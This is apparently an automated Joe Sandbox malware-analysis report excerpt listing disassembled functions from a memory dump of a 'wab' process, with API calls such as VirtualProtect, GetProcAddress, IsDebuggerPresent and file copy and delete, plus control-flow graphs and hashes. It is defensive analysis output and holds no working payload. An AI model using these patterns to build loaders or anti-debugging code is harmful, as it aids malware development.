                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C816
                                                                                                                                                                                                                        • Part of subcall function 3563C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C82A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2099061454-0
                                                                                                                                                                                                                      • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction ID: fe935bec7736094f8040a44fa3d8a86dd74d6efd56af0792efd2dcfca8df5fe9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721686570F3816FF7918B744C02BA27FE8AF132A0F180696F040CB563D6B88646C3A7
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 3563C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 107 3563c803-3563c80b GetProcAddress 108 3563c82d 107->108 109 3563c80d-3563c81a VirtualProtect 107->109 112 3563c82f-3563c833 108->112 110 3563c82c 109->110 111 3563c81c-3563c82a VirtualProtect 109->111 110->108 111->110 113 3563c872 call 3563c877 112->113 114 3563c835-3563c83d GetModuleHandleA 112->114 116 3563c83f-3563c847 114->116 116->116 117 3563c849-3563c84c 116->117 117->112 118 3563c84e-3563c850 117->118 119 3563c852-3563c854 118->119 120 3563c856-3563c85e 118->120 121 3563c85f-3563c865 GetProcAddress 119->121 120->121 124 3563c866-3563c86e 121->124 126 3563c870 124->126 126->117
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,3563C7F4), ref: 3563C804
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C816
                                                                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,3563C7F4,3563C7DD), ref: 3563C82A
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,3563C7DD), ref: 3563C838
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 3563C860
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2152742572-0
                                                                                                                                                                                                                      • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction ID: f01ce1aaaf20618411f8cf41076bd0b1d3479dd94f5df5e71e2b29bccc951fc5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ACF0CD8578B7403CFA9186B40C43EBA5FDC9F276A0B101A56F101C75A2D9B58706C3FB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 3563571E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 136 3563571e-35635727 137 35635756-35635757 136->137 138 35635729-3563573c RtlFreeHeap 136->138 138->137 139 3563573e-35635755 call 35636368 GetLastError call 356362ef 138->139 139->137
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,3563924F,?,00000000,?,00000000,?,35639276,?,00000007,?,?,35637E5A,?), ref: 35635734
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,3563924F,?,00000000,?,00000000,?,35639276,?,00000007,?,?,35637E5A,?,?), ref: 35635746
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                      • Opcode ID: c7af81995f870ecaa34d8a6a240de64aadf5ed89ac6e6c6a2b7fc3852966a667
                                                                                                                                                                                                                      • Instruction ID: 4922e005fa339af5e19d627b89db458d61bf42f1b761f52e270e068f8161a551
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7af81995f870ecaa34d8a6a240de64aadf5ed89ac6e6c6a2b7fc3852966a667
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28E08C72605208BBEB211FB0E889B893BB9BB40AD0F910464F60CAB470DB308482C7D8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 35632639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 35632645
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 35632710
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 35632730
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 3563273A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                      • Opcode ID: c0033614e5134e28565c94b14cb315833073dd453d5bdf503cdf2b2e6c20c2bc
                                                                                                                                                                                                                      • Instruction ID: b29c4cba04fdb274e6b31ccc32469c225d1c0e5944be6e4279fc61d48190e8d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0033614e5134e28565c94b14cb315833073dd453d5bdf503cdf2b2e6c20c2bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3312A75D4621C9BDB11DFA4D989BCDBBB8BF08340F1040EAE40DAB260EB709A85CF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35632264 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 35632276
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 35632285
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 3563228E
                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 3563229B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                                      • Opcode ID: c70f802d7ea32148246d54d9ff891fd6f5602f2a7335379824ed5dfc0962ab48
                                                                                                                                                                                                                      • Instruction ID: 57653adff8404421a06a9bb22626fee5055ff25c5121643bb0b87f40886377ce
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c70f802d7ea32148246d54d9ff891fd6f5602f2a7335379824ed5dfc0962ab48
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7F09D70C2020CEBCB00DFB0C689A9EBBF8EF18245F9244959402F6111EB34AB068F50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35632B1C Relevance: 6.0, APIs: 4, Instructions: 12COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,35632C3B,3563D1DC,00000017), ref: 35632B21
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(3563D1DC,?,35632C3B,3563D1DC,00000017), ref: 35632B2A
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,35632C3B,3563D1DC,00000017), ref: 35632B35
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,35632C3B,3563D1DC,00000017), ref: 35632B3C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                      • Opcode ID: 4d5768ee4f5ffd31b91da6c1bae4d72dd713aa1a5048edbe240c396a3cf435fe
                                                                                                                                                                                                                      • Instruction ID: dbb64c1b45cd0992b624e67f65aad6c60539a9146e76d63f7ef7d8d4a1894ea6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d5768ee4f5ffd31b91da6c1bae4d72dd713aa1a5048edbe240c396a3cf435fe
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89D0E97105C20CBBD7002FE1ED0DA5D3B39EB04A96F864490F709A6462DF759457CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 356360E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 356361DA
                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 356361E4
                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 356361F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                      • Opcode ID: 4f4f01e7800238dd66ae25ce3bf25f7a9f8c4ba010a316d171cc18a7ad58ddfc
                                                                                                                                                                                                                      • Instruction ID: 9bdfd25b9e89175b66a94d401612708b6daf86d7bd17cbf2a03fe7fc99aea7e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f4f01e7800238dd66ae25ce3bf25f7a9f8c4ba010a316d171cc18a7ad58ddfc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8331C57591221CABCB61DF64D989B8DBBB8BF08710F5041DAE81DA7260EB309B85CF45
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35634AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000,00000001,35632082,35642108,0000000C,35631F3A,?), ref: 35634AD5
                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,35634A8A,?,35642238,0000000C,35634BBD,00000000,00000000,00000001,35632082,35642108,0000000C,35631F3A,?), ref: 35634ADC
                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 35634AEE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                      • Opcode ID: 830fc6dba29cd6a043e325183ee7974ff6393be990189ec804feec066b524114
                                                                                                                                                                                                                      • Instruction ID: 97855253feff11f3e61622d14586bb4d9cfb18d24d3bd1e71c29e4bd8497be11
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 830fc6dba29cd6a043e325183ee7974ff6393be990189ec804feec066b524114
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4E0B636115208AFCF016F64DD4EA497B7AFF40782B914054F9059B532DF35D983CA98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35632933 Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 3563294C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                      • Opcode ID: 19a4368239c5d165140833d22a4bfbf3034628f17f2edef7e121eb9de4a434c3
                                                                                                                                                                                                                      • Instruction ID: 67bf6c894a8240e86e99899228f80332f44bf1630960f242967f41c4545a2680
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19a4368239c5d165140833d22a4bfbf3034628f17f2edef7e121eb9de4a434c3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A841A0F1A16208AFEB20CF55D48269EBBF4FB48304F60856AD406F7664DB719A41CBA0
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 3563724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                                      • Opcode ID: 8a0087a3b3c5a80870d197d82be16b22274af446b187fe765def639129ddf8bc
                                                                                                                                                                                                                      • Instruction ID: 781947329c13b0e50a3355b3511a151906f0092953444f1037295044820521c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a0087a3b3c5a80870d197d82be16b22274af446b187fe765def639129ddf8bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97A01270314106DF43404E30520920C35FC69405C034100545808D0110EF3080424604
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35631CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D1B
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 35631D37
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D4B
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D58
                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D72
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D7D
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 35631D8A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1454806937-0
                                                                                                                                                                                                                      • Opcode ID: b53d7496293398022eac4929a13d7a016a608ec821d62646e9fdbffc35887270
                                                                                                                                                                                                                      • Instruction ID: 325af38005aab5c7e0ea992119b7b8d6bbc84034c5b5256b1888200ebfe6b918
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b53d7496293398022eac4929a13d7a016a608ec821d62646e9fdbffc35887270
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA215EB194221CBFE7109FA09C8DEEB76BCEB09798F4105A5F501E2160DB709E868B70
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 356339BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 248 356339be-356339c8 249 35633a6e-35633a71 248->249 250 35633a77 249->250 251 356339cd-356339dd 249->251 254 35633a79-35633a7d 250->254 252 356339ea-35633a03 LoadLibraryExW 251->252 253 356339df-356339e2 251->253 257 35633a55-35633a5e 252->257 258 35633a05-35633a0e GetLastError 252->258 255 35633a6b 253->255 256 356339e8 253->256 255->249 259 35633a67-35633a69 256->259 257->259 262 35633a60-35633a61 FreeLibrary 257->262 260 35633a10-35633a22 call 356355f6 258->260 261 35633a45 258->261 259->255 263 35633a7e-35633a80 259->263 260->261 268 35633a24-35633a36 call 356355f6 260->268 265 35633a47-35633a49 261->265 262->259 263->254 265->257 267 35633a4b-35633a53 265->267 267->255 268->261 271 35633a38-35633a43 LoadLibraryExW 268->271 271->265
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                                                      • Opcode ID: c7ca436706f0a349382267c1b0af32f3643ba5c86cb802b7770fc78468cb070f
                                                                                                                                                                                                                      • Instruction ID: 97ad11077fb751bed0b5b64cd7881bab38c7409fb5e379671ded36aea56dc314
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7ca436706f0a349382267c1b0af32f3643ba5c86cb802b7770fc78468cb070f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7811B776B07315FBE7119A68DC86E0A3768AF81BE0F590150E816B76B1EF70D901C6E1
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 35631000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,?), ref: 35631038
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3563104B
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 35631061
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 35631075
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 35631090
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 356310B8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066860642.0000000035630000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000007.00000002.45066894279.0000000035646000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_35630000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3594823470-0
                                                                                                                                                                                                                      • Opcode ID: a10d8edd026210500139a31b76f64a45b68cdd5c5671fbebcff1c418ba39118b
                                                                                                                                                                                                                      • Instruction ID: 54375331e2c4297a46fc0b0521266bc8c4ba2eb26e23fc5400c6f7f5b86e6359
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a10d8edd026210500139a31b76f64a45b68cdd5c5671fbebcff1c418ba39118b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC217F7590135CABCF10DE60DC49EDB3779EF44254F104296E869971B1DF309A86CB51
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 356311EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 35631E89: lstrlenW.KERNEL32(?,?,?,?,?,356310DF,?,?,?,00000000), ref: 35631E9A
                                                                                                                                                                                                                        • Part of subcall function 35631E89: lstrcatW.KERNEL32(?,?), ref: 35631EAC
                                                                                                                                                                                                                        • Part of subcall function 35631E89: lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EB3
                                                                                                                                                                                                                        • Part of subcall function 35631E89: lstrlenW.KERNEL32(?,?,356310DF,?,?,?,00000000), ref: 35631EC8
                                                                                                                                                                                                                        • Part of subcall function 35631E89: lstrcatW.KERNEL32(?,356310DF), ref: 35631ED3
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 3563122A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000007.00000002.45066894279.0000000035631000.00000040.00001000.00020000.00000000.sdmp, Offset: 35630000, based on PE: true
